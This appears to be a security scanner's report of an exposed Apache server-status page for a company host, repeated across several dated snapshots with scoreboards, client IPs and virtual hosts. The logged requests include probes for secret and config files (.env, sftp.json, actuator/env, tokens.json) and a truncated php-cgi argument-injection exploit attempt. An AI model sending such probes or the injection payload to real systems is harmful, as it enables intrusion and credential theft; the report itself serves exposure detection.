14.1710362473160.08.991425.36 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 1-42617099930/226/52084_ 14.1650493887040.06.371512.90 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-42617098610/33/49164_ 3.941075476267078020.00.771468.19 172.69.228.156h2tandemsl.com:443done, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 2-42617098610/20/48395_ 4.127430407661790.01.071387.28 172.71.235.95h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/21/48901_ 3.98738470314115260.01.421516.90 172.70.142.209h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 2-42617098610/17/48111_ 3.81743612246896240.00.291439.81 104.23.175.247h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/18/48619_ 3.97743541260107070.00.291604.50 172.70.142.209h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/25/48963_ 3.99737540253638530.00.211459.39 172.70.142.209h2tandemsl.com:443idle, streams: 0/5/5/0/0 (open/recv/resp/push/rst) 2-42617098610/18/48493_ 3.98738527230243490.00.451466.89 172.70.142.209h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/25/48732_ 3.801075637262463970.01.631467.74 172.71.164.65h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/22/48658_ 4.127431256413130.00.271642.11 172.71.10.14h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-42617098610/21/49033_ 3.97738460277415940.00.351519.78 172.70.142.209h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42617098590/93/55958_ 9.8640337129250.02.511722.35 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-42617098590/117/54649_ 9.790333303056200.02.271531.35 172.68.225.144h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42617098590/110/55923_ 9.8600338489860.01.781720.32 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-42617098590/107/55026_ 9.8630360298500.02.331832.60 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-42617098590/104/55388_ 9.7910287192750.02.721583.15 162.158.122.22h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42617098590/134/55445_ 9.864232273595970.014.991753.41 172.70.211.22h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-42617098590/105/55832W 9.7700308419960.02.421755.31 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-42617098590/107/55555_ 9.8630392504820.030.391787.44 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-42617098590/86/54679_ 9.8540926872570.01.881664.85 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 3-42617098590/101/56044_ 9.8500411991940.01.951665.44 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 4-42617099640/252/48788_ 17.86743458418221130.06.571597.28 172.70.93.25h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-42617099640/234/49079_ 18.2420291233000.06.801604.03 157.245.105.107http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-42617099640/248/49122_ 17.82737809249216540.08.851636.51 162.158.163.32h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42617099640/277/49435_ 17.79549485269482350.06.181545.04 162.158.79.49h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-42617099640/247/48441
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c755ae5aacf7
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 29-Nov-2025 05:05:53 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 416 Parent Server MPM Generation: 415 Server uptime: 77 days 16 hours 44 minutes 50 seconds Server load: 0.14 0.08 0.08 Total accesses: 2447365 - Total Traffic: 75.1 GB - Total Duration: 1548446895 CPU Usage: u162.8 s229.34 cu13610.8 cs7783.33 - .325% CPU load .365 requests/sec - 11.7 kB/second - 32.2 kB/request - 632.7 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01429466no0yes010000 11429467no0yes010000 21429468no0yes010000 31429465no1yes010000 41429598no0yes19000 Sum501 149000 ________________________________________________W_ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-41514294660/0/45207_ 0.0029826338997870.00.001673.41 172.68.134.218h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/1/44634_ 0.0800494001870.00.001434.69 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-41514294660/0/45195_ 0.002980226602910.00.001447.83 54.233.182.166http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/0/44768_ 0.000811220716730.00.001482.63 172.71.103.136h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/0/45542_ 0.002980212762460.00.001518.98 205.169.39.19http/1.1 0-41514294660/0/45050_ 0.002980213791240.00.001535.70 172.69.59.209h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/0/45232_ 0.002980296635540.00.001434.52 205.169.39.19http/1.1cinre-viewer.tandemhse.com:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/0/44550_ 0.0029822223286490.00.001524.99 172.68.134.93h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/0/45365_ 0.00298205218317870.00.001412.37 162.158.174.105h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-41514294660/0/45134_ 0.00298821328418010.00.001638.23 172.69.194.194h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/0/50203_ 0.002980226123700.00.001653.88 54.233.182.166http/1.1relehse.com:443GET /web/.env HTTP/1.1 1-41514294670/0/50712_ 0.002980268140320.00.001643.48 54.233.182.166http/1.1relehse.com:443GET /tokens.json HTTP/1.1 1-41514294670/0/50339_ 0.002980280310930.00.001554.34 54.233.182.166http/1.1 1-41514294670/0/50259_ 0.002980719621220.00.001528.76 54.233.182.166http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/0/50783_ 0.002980244409840.00.001593.04 54.233.182.166http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/0/51475_ 0.002980244503720.00.001558.04 54.233.182.166http/1.1relehse.com:443GET /debug.php HTTP/1.1 1-41514294670/0/50585_ 0.00298351277220130.00.001520.46 162.159.106.117h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/0/51227_ 0.002981226944840.00.001532.60 172.70.108.135h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-41514294670/0/49381_ 0.002980354869160.00.001369.60 54.233.182.166http/1.1relehse.com:443GET /.dockerenv HTTP/1.1 1-41514294670/0/50851_ 0.002980479474730.00.001482.92 54.233.182.166http/1.1relehse.com:443GET /web.config HTTP/1.1 2-41514294680/0/47577_ 0.002980255364010.00.001423.61 162.159.116.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/0/46799_ 0.002985396779510.00.001354.92 172.68.135.216h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/0/47489_ 0.002980305587890.00.001485.73 52.199.197.143http/1.1cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/0/46523_ 0.0029887234581270.00.001396.88 158.173.158.57http/1.1barrerasdecontencion.com:443GET / HTTP/1.0 2-41514294680/0/46858_ 0.002980210665210.00.001563.88 162.158.91.101h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/0/47338_ 0.00298522243547440.00.001377.96 172.71.194.25h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/0/46902_ 0.002984221833980.00.001430.36 52.199.197.143http/1.1cinre-backend.tandemhse.com:443GET /psnlink/.env HTTP/1.1 2-41514294680/0/47156_ 0.002980251276830.00.001429.66 162.158.187.90h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/0/47128_ 0.002980245782130.00.001608.73 162.158.187.190h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-41514294680/0/47585_ 0.002982265105820.00.001460.32 104.23.213.35h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41514294650/2/55175_ 0.1101276333322400.00.031702.13 104.22.17.8h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41514294650/3/53774_ 0.1600299940390.00.011506.21 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-41514294650/2/55068_ 0.1600334623450.00.001680.63 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-41514294650/2/54162_ 0.1700355659890.00.331797.36 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-41514294650/1/54580_ 0.1500284046150.00.001562.19 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 3-41514294650/3/54513_ 0.1700268435800.00.011696.23 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-41514294650/0/54985_ 0.0000304221130.00.001727.61 52.199.197.143http/1.1cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41514294650/4/54773_ 0.1510388432400.00.021720.87 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-41514294650/1/53897_ 0.031720923472070.00.031640.34 172.71.190.39h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-41514294650/3/55197_ 0.1700408737060.00.001624.02 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-41514295980/3/47323_ 0.1210410386930.00.021557.43 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 4-41514295980/1/47531_ 0.091313283749680.00.001559.18 188.114.111.214h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41514295980/0/47576_ 0.001881242110380.00.001582.35 172.70.130.36h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41514295980/2/47725_ 0.1210260635290.00.001500.41 134.209.25.199http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 4-41514295980/0/46954_ 0.001516273648730.00.001428.90 128.192.12.109http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-41514295980/4/47280_ 0.13
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7556de3afdf
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Wednesday, 26-Nov-2025 11:32:42 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 398 Parent Server MPM Generation: 397 Server uptime: 74 days 23 hours 11 minutes 40 seconds Server load: 0.21 0.34 0.50 Total accesses: 2361697 - Total Traffic: 72.5 GB - Total Duration: 1474118399 CPU Usage: u191.21 s235.98 cu13011.5 cs7462.35 - .323% CPU load .365 requests/sec - 11.7 kB/second - 32.2 kB/request - 624.178 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0989408no0yes010000 1989266no0yes010000 2989371no0yes19000 3989268no1yes010000 4989267no3yes010010 Sum504 149010 ___________________________W______________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3979894080/305/43670_ 14.6930325423300.018.721610.50 162.158.122.109h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/252/43161_ 14.4382544483511850.04.981388.17 172.70.142.208h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/256/43677_ 14.548235196720190.06.871412.53 172.68.134.227h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/259/43295_ 14.4182456208496130.06.371433.48 172.71.235.119h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/282/44086_ 14.4787504202492690.06.641465.19 162.158.163.32h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/278/43587_ 14.7430203260080.06.861448.22 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 0-3979894080/262/43820_ 14.70870283129010.09.731388.56 162.158.122.114h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/252/43100_ 14.1782438213442610.06.141464.38 172.71.218.201h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/349/43813_ 14.70870208821470.05.591377.40 104.22.23.23h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3979894080/302/43596_ 14.7400317026360.06.701562.92 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-3979892660/28/48700_ 4.2487442215541660.00.441591.45 172.68.211.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/33/49239_ 4.31331254689860.00.481576.97 188.114.111.88h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/27/48879_ 4.1382508262027900.00.571506.61 162.158.106.91h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/27/48776_ 4.16519538710203820.00.351480.45 104.23.175.17h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/34/49392_ 4.194501232079950.01.941558.79 172.71.220.132h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/26/49982_ 3.9282565229078390.01.091521.95 108.162.226.132h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/25/49087_ 4.45870263718990.00.171484.08 104.22.23.43h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3979892660/33/49664_ 4.4830215935480.00.291488.11 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 1-3979892660/32/47922_ 4.4840341571810.00.481340.34 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql HTTP/1.1 1-3979892660/33/49357_ 4.21519506467220590.00.251445.94 172.68.164.5h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3979893710/228/46219_ 14.2781466244913820.04.541386.34 104.22.10.13h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3979893710/262/45240_ 14.71780380325340.06.151325.38 162.158.122.197h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3979893710/322/46083_ 14.3978470295060360.08.261413.73 172.70.208.138h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3979893710/271/45156_ 14.2973577222136300.05.581342.60 172.70.240.10h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3979893710/225/45396_ 14.71730198615920.04.681527.00 162.158.122.101h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3979893710/243/45920_ 14.3482512215261570.07.431343.66 162.158.163.31h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3979893710/243/45423_ 14.71860211856690.06.291378.86 162.158.122.128h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3979893710/234/45735W 14.4500240561290.05.561382.32 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-3979893710/260/45700_ 14.32821404232247170.07.881553.56 172.71.238.44h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3979893710/312/46170_ 14.3781406254270880.06.491425.02 162.158.106.90h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3979892680/93/53174_ 9.85142318092880.02.251645.88 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3979892680/125/51693_ 9.8900283287960.03.661450.66 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-3979892680/85/52989_ 9.8900312005000.01.791636.37 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-3979892680/93/52088_ 9.8900334255110.03.061740.38 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-3979892680/126/52436_ 9.8800260251330.01.801519.66 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 3-3979892680/156/52417_ 9.8900246175620.02.541624.87 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-3979892680/105/52820_ 9.8910291624570.02.131689.18 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 3-3979892680/99/52778_ 9.8900371873820.02.121662.83 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 3-3979892680/85/51885_ 9.83120910899740.01.811597.96 162.158.122.98h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3979892680/106/53072_ 9.8900388331250.02.151576.99 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 4-3979892670/48/45183_ 6.7410395544860.00.821420.52 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 4-3979892670/43/45380_ 6.62215266820430.01.521490.65 80.24.155.227h2relehse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-3979892670/67/45437_ 6.7420227490890.02.221539.88 142.93.143.8http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /webjars/swagger-ui/index.html HTTP/1.1 4-3979892670/39/45640_ 6.70213242931810.013.631449.83 212.170.119.244h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3979892670/47/44860_ 6.7420254280810.01.031381.02 142.93.143
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e071c755e071c7557a5ca364
Apache Status Apache Server Status for adr.tandemhse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Monday, 24-Nov-2025 15:04:02 CET Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 390 Parent Server MPM Generation: 389 Server uptime: 73 days 2 hours 42 minutes 59 seconds Server load: 0.31 0.45 0.64 Total accesses: 2292266 - Total Traffic: 70.5 GB - Total Duration: 1439066322 CPU Usage: u166.03 s220.15 cu12645.4 cs7266.99 - .321% CPU load .363 requests/sec - 11.7 kB/second - 32.2 kB/request - 627.792 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0784555no2yes19000 1784554no1yes010000 2784590no1yes010000 3784687no3yes010002 4784574no1yes010000 Sum508 149002 __W_______________________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-3897845550/14/42691_ 1.41153322743540.00.131580.53 162.158.172.236h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/9/42263_ 1.42140480335120.00.111359.82 172.64.200.132h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/10/42749W 1.4400193908610.00.091393.47 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 0-3897845550/11/42345_ 1.4460205877290.00.221397.17 172.64.200.141h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/9/43129_ 1.42190200037800.00.141446.10 172.64.198.114h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/10/42635_ 1.43140200372190.00.041430.19 172.68.159.200h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/15/42897_ 1.42150280294670.00.141353.20 172.64.200.119h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/8/42175_ 1.40191210648800.00.141415.80 162.158.172.123h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/11/42833_ 0.98140205739360.00.181361.07 162.10.161.82http/1.1cinre-backend.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-3897845550/11/42636_ 1.4560314375020.00.341522.88 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 1-3897845540/16/46597_ 1.60150206072030.00.701517.07 172.64.200.131h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3897845540/13/47210_ 1.62200244434450.00.671522.70 162.158.103.155h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3897845540/11/46807_ 1.61240251478830.00.181465.67 172.68.159.166h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3897845540/15/46714_ 1.60240699173830.00.591432.80 172.64.200.131h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3897845540/11/47391_ 1.58240222306420.00.651513.65 172.64.198.89h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3897845540/9/47945_ 1.58240218676560.00.081427.33 172.68.159.235h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-3897845540/14/47101_ 1.58240254662750.00.201425.17 162.158.103.194h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3897845540/12/47591_ 1.59243205117440.00.351443.61 172.64.200.194h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3897845540/11/45961_ 1.60200332552500.00.291299.25 162.158.103.221h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-3897845540/16/47282_ 1.60150458112140.01.521384.61 162.158.172.156h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-3897845900/202/45472_ 8.9320241507740.04.791371.84 172.64.200.216h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3897845900/189/44416_ 8.9300376668900.011.031291.02 172.64.198.209h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3897845900/236/45217_ 8.9430291794330.03.851394.06 172.64.198.149h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-3897845900/245/44371_ 8.9720218908290.015.461326.16 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-3897845900/193/44601_ 8.9710195446770.04.791513.38 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 2-3897845900/221/45112_ 8.9700211838710.03.561326.05 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-3897845900/208/44588_ 8.9720208648070.03.181361.42 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-3897845900/229/44976_ 8.9710237517200.04.631366.17 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-3897845900/208/44909_ 8.9800229180770.04.271534.24 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-3897845900/237/45320_ 8.8501251096690.02.971408.73 172.64.200.57h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3897846870/109/50994_ 5.3330307203790.01.611570.11 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-3897846870/86/49341_ 5.3310272476670.01.711378.92 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-3897846870/111/50773_ 5.3320292515270.01.991577.46 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 3-3897846870/90/49814_ 5.3150321493650.01.931676.73 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api/graphql HTTP/1.1 3-3897846870/164/50060_ 5.2030246830010.04.041432.19 162.158.103.118h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3897846870/113/49975_ 5.3050234801190.015.571558.98 162.158.103.173h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3897846870/86/50505_ 5.3120280074180.01.071605.31 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-3897846870/82/50499_ 5.2700357020110.022.611590.02 172.68.159.175h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-3897846870/113/49628_ 5.3320894154760.03.621505.45 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-3897846870/95/50655_ 5.3350375448080.01.301521.71 143.110.217.244http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 4-3897845740/18/44406_ 1.81200374654830.00.861384.45 172.64.200.139h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3897845740/20/44494_ 1.80150263246760.00.151456.11 172.64.198.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-3897845740/19/44616_ 1.80130224192950.00.111524.22 172.64.198.49h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-3897845740/22/44848_ 1.82241239241620.00.361367.72 172.68.159.169h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-3897845740/18/44009_ 1.80151249130720.00.191329.85 172.64.200.1
Severity: medium
